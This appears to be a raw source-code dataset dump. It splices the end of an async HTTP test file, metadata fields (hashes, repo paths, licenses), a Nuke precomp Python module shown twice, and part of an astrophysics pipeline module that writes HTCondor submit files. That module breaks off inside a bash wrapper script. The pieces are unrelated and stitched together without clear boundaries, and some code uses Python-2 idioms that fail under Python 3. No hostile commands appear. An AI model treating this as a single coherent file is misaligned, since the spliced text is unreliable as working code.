assert resp.status == 404
resp_json = await resp.json()
assert resp_json["message"] == "Topic does not exist"
async def test_topic_message_empty(self, cli, topic):
resp = await cli.get("/topic/%s/message" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert type(resp_json) == list
assert len(resp_json) == 0
async def test_topic_message(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages
assert len(resp_json) == 3
async def test_topic_message_offset(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?offset=1" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[1:]
assert len(resp_json) == 2
async def test_topic_message_count(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?count=2" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[:2]
assert len(resp_json) == 2
async def test_topic_message_offset_and_count(self, cli, topic, messages):
resp = await cli.get("/topic/%s/message?offset=1&count=1" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == messages[1:2]
assert len(resp_json) == 1
| 2,481
| 408
| 23
|
d04c8eff07c31a44f0aef8503a211c69268b39fd
| 8,889
|
py
|
Python
|
nuke_stubs/nukescripts/precomp.py
|
sisoe24/Nuke-Python-Stubs
|
79c53cf5cb7b38e15a34fd04f672b143d9d7dc85
|
[
"MIT"
] | 1
|
2022-01-12T01:29:16.000Z
|
2022-01-12T01:29:16.000Z
|
nuke_stubs/nukescripts/precomp.py
|
sisoe24/Nuke-Python-Stubs
|
79c53cf5cb7b38e15a34fd04f672b143d9d7dc85
|
[
"MIT"
] | null | null | null |
nuke_stubs/nukescripts/precomp.py
|
sisoe24/Nuke-Python-Stubs
|
79c53cf5cb7b38e15a34fd04f672b143d9d7dc85
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2009 The Foundry Visionmongers Ltd. All Rights Reserved.
import nuke
import os, re, sys, math, time
from nukescripts import execute_panel
from nukescripts import panels
| 28.399361
| 167
| 0.623242
|
# Copyright (c) 2009 The Foundry Visionmongers Ltd. All Rights Reserved.
import nuke
import os, re, sys, math, time
from nukescripts import execute_panel
from nukescripts import panels
class PrecompOptionsDialog( panels.PythonPanel ):
def __init__( self ):
panels.PythonPanel.__init__( self, "Precomp Nodes", "uk.co.thefoundry.PrecompOptionsDialog" )
self.scriptPath = nuke.File_Knob( "script", "Precomp script path " )
self.renderPath = nuke.File_Knob( "render", "Precomp render path " )
self.channels = nuke.Channel_Knob( "channels", "Channels " )
self.origNodes = nuke.Enumeration_Knob( "orig", "Original nodes ", ["add backdrop", "delete", "no change" ] )
self.addKnob ( self.scriptPath )
self.addKnob ( self.renderPath )
self.addKnob ( self.channels )
self.addKnob ( self.origNodes )
self.channels.setValue('all')
defaultDir = nuke.Root()['name'].value()
if defaultDir and defaultDir != "":
defaultDir = os.path.dirname( defaultDir )
if not defaultDir.endswith("/"):
defaultDir += "/"
else:
defaultDir = ""
basename = findNextName("Precomp")
self.scriptPath.setValue( defaultDir + basename + "_v01.nk" )
self.renderPath.setValue( defaultDir + basename + ".####.exr" )
self.setMinimumSize( 420, 50 )
class PrecompOptions:
def __init__(self):
self.scriptPath = ""
self.renderPath = ""
self.channels = ""
self.addBackdrop = False
self.delete = False
def askUserForOptions(self):
p = PrecompOptionsDialog()
result = p.showModalDialog()
if result:
self.scriptPath = p.scriptPath.value()
self.renderPath = p.renderPath.value()
self.channels = p.channels.value()
if p.origNodes.value() == "delete":
self.delete = True
elif p.origNodes.value() == "add backdrop":
self.addBackdrop = True
if nuke.env['nc']:
nukeExt = ".nknc"
if nuke.env['indie']:
nukeExt = ".nkind"
else:
nukeExt = ".nk"
(root, ext) = os.path.splitext(self.scriptPath)
if not ext:
self.scriptPath += nukeExt
elif ext == ".nk" and ext != nukeExt:
self.scriptPath = self.scriptPath[0:-3] + nukeExt
(root,ext) = os.path.splitext(self.renderPath)
if not ext:
self.renderPath += ".exr"
if os.path.exists(self.scriptPath):
if not nuke.ask("Overwrite existing " + self.scriptPath + " ?"):
return False
return True
else:
return False
def precomp_open(precomp):
precomp.executePythonCallback(nuke.PRECOMP_CALLBACK_OPENED)
nuke.Root().setModified( True )
nuke.scriptOpen(precomp["file"].evaluate())
def precomp_render(precomp):
reading = precomp["reading"].getValue()
precomp["reading"].setValue( False )
try:
finalNode = None
if precomp['useOutput'].value() == True:
finalNode = nuke.toNode( precomp['output'].value() )
else:
if precomp.output() and precomp.output().input(0):
finalNode = precomp.output().input(0)
execute_panel( [ finalNode ] )
except RuntimeError as e:
if e.message[0:9] != "Cancelled": # TO DO: change this to an exception type
raise
return
precomp["reading"].setValue( True )
def findNextName(name):
i = 1
while nuke.toNode ( name + str(i) ) != None:
i += 1
return name + str(i)
def precomp_copyToGroup(precomp):
## group context is set to precomp, so back up one level.
nuke.endGroup()
g = nuke.nodes.Group()
with precomp:
nuke.selectAll()
nuke.nodeCopy ( '%clipboard%' )
with g:
nuke.nodePaste( '%clipboard%' )
for k in ['label', 'icon', 'indicators', 'tile_color', 'disable']:
v = precomp[k].value()
if v:
g[k].setValue( v )
for k in precomp.allKnobs():
if isinstance( k, nuke.Link_Knob ):
lnk = nuke.Link_Knob( k.name() )
lnk.setLink( k.getLink() )
g.addKnob( lnk )
def precomp_selected():
nodes = nuke.selectedNodes()
if len(nodes) == 0:
g = nuke.createNode( "Precomp" )
return
options = PrecompOptions()
if not options.askUserForOptions():
return False
sel = nodes[0]
## select upstream nodes
if len( nodes ) == 1:
upstreamNodes = nuke.dependencies( nodes )
while len ( upstreamNodes ) != 0:
nodes += upstreamNodes
upstreamNodes = nuke.dependencies( upstreamNodes )
left = right = nodes[0].xpos()
top = bottom = nodes[0].ypos()
nodeSize = 100
titleHeight = 50
inputs = []
for n in nodes:
n["selected"].setValue ( True )
if n.xpos() < left:
left = n.xpos()
if n.xpos() > right:
right = n.xpos()
if n.ypos() < top:
top = n.ypos()
if n.ypos() > bottom:
bottom = n.ypos()
for i in range( 0, n.inputs() ):
if not n.input(i):
continue
if not n.input(i) in nodes:
inputs.append( n.input(i) )
## find all the dependent nodes
inputDeps = []
expressionDeps = []
for n in nodes:
for d in nuke.dependentNodes( nuke.INPUTS, [n]):
if d not in nodes:
if d.Class() != 'Viewer':
inputIndices = [i for i in range(d.inputs()) if d.input(i) == n]
inputDeps.append( (d, inputIndices) )
for d in nuke.dependencies( [n], nuke.EXPRESSIONS ):
if d not in nodes:
expressionDeps.append( d )
if len(inputDeps) > 1:
nuke.message( "You cannot precomp the selected nodes because there are multiple outputs." )
return
addLinkedExpressionNodes = False
if len(expressionDeps) > 0:
addLinkedExpressionNodes = nuke.ask( "Warning: The selected nodes have expressions to nodes outside the precomp. Do you want to copy these nodes to the precomp?" )
## make group and export
if len( nodes ) == 1 and nodes[0].Class() == "Group":
group = nodes[0]
else:
group = nuke.makeGroup( False )
with group:
outputInputs = []
output = group.output()
for i in range(0, output.inputs()):
outputInputs.append( output.input(i) )
## insert write node or use existing one
outInp = output.input(0)
if outInp is None or outInp.Class() != "Write":
w = nuke.createNode( "Write", inpanel = False)
w.setInput( 0, None )
else:
w = outInp
for i in range(0, len(outputInputs) ):
w.setInput( i, outputInputs[i] )
output.setInput(i, None )
output.setInput(0, w )
w.knob("file").setValue( options.renderPath )
type = os.path.splitext( options.renderPath)[1][1:].lower()
w.knob("file_type").setValue( type )
w.knob("channels").setValue( options.channels )
for n in nuke.allNodes():
n['selected'].setValue( False )
if addLinkedExpressionNodes:
for n in nuke.allNodes():
n['selected'].setValue( False )
for n in expressionDeps:
n['selected'].setValue( True )
nuke.nodeCopy ( '%clipboard%' )
with group:
nuke.nodePaste( '%clipboard%' )
writeOk = True
with group:
try:
nuke.tcl("export_as_precomp", options.scriptPath)
except:
nuke.message( "Could not write precomp script, permission denied, please specify a different \'script path\' and try again.")
writeOk = False
for n in nuke.selectedNodes():
n['selected'].setValue( False )
if group != nodes[0]:
group['selected'].setValue( False )
nuke.delete( group )
if not writeOk:
for n in nuke.selectedNodes():
n['selected'].setValue( False )
for n in nodes:
n['selected'].setValue( True )
return
## reload saved out script
g = nuke.createNode( "Precomp" )
g[ "file" ].setValue( options.scriptPath )
#nuke.tprint( "Selected Node: " + sel.name() )
for d in inputDeps:
node = d[0]
for inp in d[1]:
#nuke.tprint ( "Reconnecting dep " + node.name() + " input " + str(inp) )
node.setInput(inp, g)
## reconnect inputs, if any
for i in range(0, len(inputs)):
#nuke.tprint ( "Reconnecting input " + inputs[i].name() + " " + str(i) )
g.setInput(i, inputs[i] )
pad = 5
if options.addBackdrop:
b = nuke.createNode( "BackdropNode", inpanel = False )
width = int(math.fabs(right - left)) + (pad * 2) + nodeSize
height = int(math.fabs(bottom - top)) + ( pad * 2 ) + nodeSize + titleHeight
b['label'].setValue( os.path.basename( options.scriptPath ) )
b['note_font_size'].setValue( 18 )
b.setXYpos( left - pad * 2, top - ( pad * 2) - titleHeight )
b.knob( "bdwidth" ).setValue( width )
b.knob( "bdheight").setValue( height )
b.knob( "z_order" ).setValue( 0 )
b['selected'].setValue(False)
g.setXYpos( b.xpos() + width/2 - nodeSize/2, b.ypos() + height + pad * 2 )
elif options.delete:
for n in nodes:
nuke.delete( n )
if len(inputs) > 0:
nuke.message( "Warning: The precomp script requires inputs and may not render the same independent of its parent script." )
return group
| 8,441
| 28
| 234
|
71db7646b48f42a2dbbfeaf06ad12d63c39123bf
| 72,149
|
py
|
Python
|
MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py
|
spfanning/research-projects-RIT
|
34afc69ccb502825c81285733dac8ff993f79503
|
[
"MIT"
] | 8
|
2019-10-23T01:18:44.000Z
|
2021-07-09T18:24:36.000Z
|
MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py
|
spfanning/research-projects-RIT
|
34afc69ccb502825c81285733dac8ff993f79503
|
[
"MIT"
] | 7
|
2020-01-03T14:38:26.000Z
|
2022-01-17T16:57:02.000Z
|
MonteCarloMarginalizeCode/Code/RIFT/misc/dag_utils.py
|
spfanning/research-projects-RIT
|
34afc69ccb502825c81285733dac8ff993f79503
|
[
"MIT"
] | 11
|
2019-10-23T01:19:50.000Z
|
2021-11-20T23:35:39.000Z
|
# Copyright (C) 2013 Evan Ochsner
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
A collection of routines to manage Condor workflows (DAGs).
"""
import os, sys
import numpy as np
from time import time
from hashlib import md5
from glue import pipeline
__author__ = "Evan Ochsner <evano@gravity.phys.uwm.edu>, Chris Pankow <pankow@gravity.phys.uwm.edu>"
# Taken from
# http://pythonadventures.wordpress.com/2011/03/13/equivalent-of-the-which-command-in-python/
def generate_job_id():
"""
Generate a unique md5 hash for use as a job ID.
Borrowed and modified from the LAL code in glue/glue/pipeline.py
"""
t = str( int( time() * 1000 ) )
r = str( int( np.random.random() * 100000000000000000 ) )
return md5(t + r).hexdigest()
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
def write_integrate_likelihood_extrinsic_grid_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Like the other case (below), but modified to use the sim_xml
and loop over 'event'
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'sim' is the path to the XML file with the grid
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("event")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
# FIXME: Keep in sync with arguments of integrate_likelihood_extrinsic
def write_integrate_likelihood_extrinsic_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'coinc' is the path to a coincident XML file, from which masses and
times will be drawn FIXME: remove this once it's no longer needed.
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("mass1")
ile_job.add_var_opt("mass2")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
return ile_job, ile_sub_name
def write_result_coalescence_sub(tag='coalesce', exe=None, log_dir=None, output_dir="./", use_default_cache=True):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("ligolw_sqlite")
sql_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
sql_sub_name = tag + '.sub'
sql_job.set_sub_file(sql_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
sql_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
sql_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
sql_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if use_default_cache:
sql_job.add_opt("input-cache", "ILE_$(macromassid).cache")
else:
sql_job.add_arg("$(macrofiles)")
#sql_job.add_arg("*$(macromassid)*.xml.gz")
sql_job.add_opt("database", "ILE_$(macromassid).sqlite")
#if os.environ.has_key("TMPDIR"):
#tmpdir = os.environ["TMPDIR"]
#else:
#print >>sys.stderr, "WARNING, TMPDIR environment variable not set. Will default to /tmp/, but this could be dangerous."
#tmpdir = "/tmp/"
tmpdir = "/dev/shm/"
sql_job.add_opt("tmp-space", tmpdir)
sql_job.add_opt("verbose", None)
sql_job.add_condor_cmd('getenv', 'True')
sql_job.add_condor_cmd('request_memory', '1024')
return sql_job, sql_sub_name
def write_posterior_plot_sub(tag='plot_post', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("plot_like_contours")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("show-points", None)
plot_job.add_opt("dimension1", "mchirp")
plot_job.add_opt("dimension2", "eta")
plot_job.add_opt("input-cache", "ILE_all.cache")
plot_job.add_opt("log-evidence", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '1024')
return plot_job, plot_sub_name
def write_tri_plot_sub(tag='plot_tri', injection_file=None, exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("make_triplot")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("output", "ILE_triplot_$(macromassid).png")
if injection_file is not None:
plot_job.add_opt("injection", injection_file)
plot_job.add_arg("ILE_$(macromassid).sqlite")
plot_job.add_condor_cmd('getenv', 'True')
#plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_1dpos_plot_sub(tag='1d_post_plot', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("postprocess_1d_cumulative")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("save-sampler-file", "ILE_$(macromassid).sqlite")
plot_job.add_opt("disable-triplot", None)
plot_job.add_opt("disable-1d-density", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_CIP_sub(tag='integrate', exe=None, input_net='all.net',output='output-ILE-samples',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=8192,arg_vals=None, no_grid=False,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ConstructIntrinsicPosterior_GenericCoordinates.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("fname", input_net)
ile_job.add_opt("fname-output-samples", out_dir+"/"+output)
ile_job.add_opt("fname-output-integral", out_dir+"/"+output)
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "fname_output_samples" in kwargs and kwargs["fname_output_samples"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_samples"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
if "fname_output_integral" in kwargs and kwargs["fname_output_integral"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_integral"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
def write_puff_sub(tag='puffball', exe=None, input_net='output-ILE-samples',output='puffball',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=1024,arg_vals=None, no_grid=False,**kwargs):
"""
Perform puffball calculation
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ParameterPuffball.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("inj-file", input_net)
ile_job.add_opt("inj-file-out", output)
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_ILE_sub_simple(tag='integrate', exe=None, log_dir=None, use_eos=False,simple_unique=False,ncopies=1,arg_str=None,request_memory=4096,request_gpu=False,request_disk=False,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,use_simple_osg_requirements=False,singularity_image=None,use_cvmfs_frames=False,frames_dir=None,cache_file=None,fragile_hold=False,max_runtime_minutes=None,condor_commands=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
if use_singularity and (singularity_image == None) :
print(" FAIL : Need to specify singularity_image to use singularity ")
sys.exit(0)
if use_singularity and (frames_dir == None) and (cache_file == None) :
print(" FAIL : Need to specify frames_dir or cache_file to use singularity (at present) ")
sys.exit(0)
if use_singularity and (transfer_files == None) :
print(" FAIL : Need to specify transfer_files to use singularity at present! (we will append the prescript; you should transfer any PSDs as well as the grid file ")
sys.exit(0)
exe = exe or which("integrate_likelihood_extrinsic")
frames_local = None
if use_singularity:
path_split = exe.split("/")
print((" Executable: name breakdown ", path_split, " from ", exe))
singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
if 'SINGULARITY_BASE_EXE_DIR' in list(os.environ.keys()) :
singularity_base_exe_path = os.environ['SINGULARITY_BASE_EXE_DIR']
else:
# singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
singularity_base_exe_path = "/usr/bin/" # should not hardcode this ...!
exe=singularity_base_exe_path + path_split[-1]
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
elif use_osg: # NOT using singularity!
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
path_split = exe.split("/")
exe=path_split[-1] # pull out basename
exe_here = 'my_wrapper.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ['../my_wrapper.sh']
with open(exe_here,'w') as f:
f.write("#! /bin/bash \n")
f.write(r"""
#!/bin/bash
# Modules and scripts run directly from repository
# Note the repo and branch are self-referential ! Not a robust solution long-term
# Exit on failure:
# set -e
export INSTALL_DIR=research-projects-RIT
export ILE_DIR=${INSTALL_DIR}/MonteCarloMarginalizeCode/Code
export PATH=${PATH}:${ILE_DIR}
